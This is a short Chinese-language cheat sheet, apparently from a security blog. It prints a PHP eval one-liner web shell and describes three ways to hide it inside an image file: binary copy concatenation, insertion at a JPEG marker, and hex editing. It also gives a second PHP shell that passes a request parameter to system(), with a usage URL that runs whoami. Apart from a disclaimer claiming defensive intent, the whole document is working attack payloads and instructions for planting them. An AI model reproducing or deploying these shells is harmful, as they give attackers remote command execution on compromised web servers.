注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
[TOC]
#常规的一句话
<?php eval($_POST[a]);?>
生成WEB图片马的方法: 方式1:采用图片和文本的形式融合一句话:
copy test.png/b+shell.php 2.jpg #意思是将test.jpg以二进制与shell.php合并成2.jpg
方式2:jpg图片标记直接插入一句话:
WeiyiGeek.jpg图片标记一句话
方式3:用hex 十六进制编辑器 Editor 打开任意一张图片将上述代码插入右边最底层或最上层后保存。
PHP小马:
#使用方法:http://weiyigeek.com/cmd.php?cmd=whoami
<?php if(isset($_REQUEST['cmd'])){echo "<pre>"; system($_REQUEST['cmd']); echo "</pre>"; die();}?>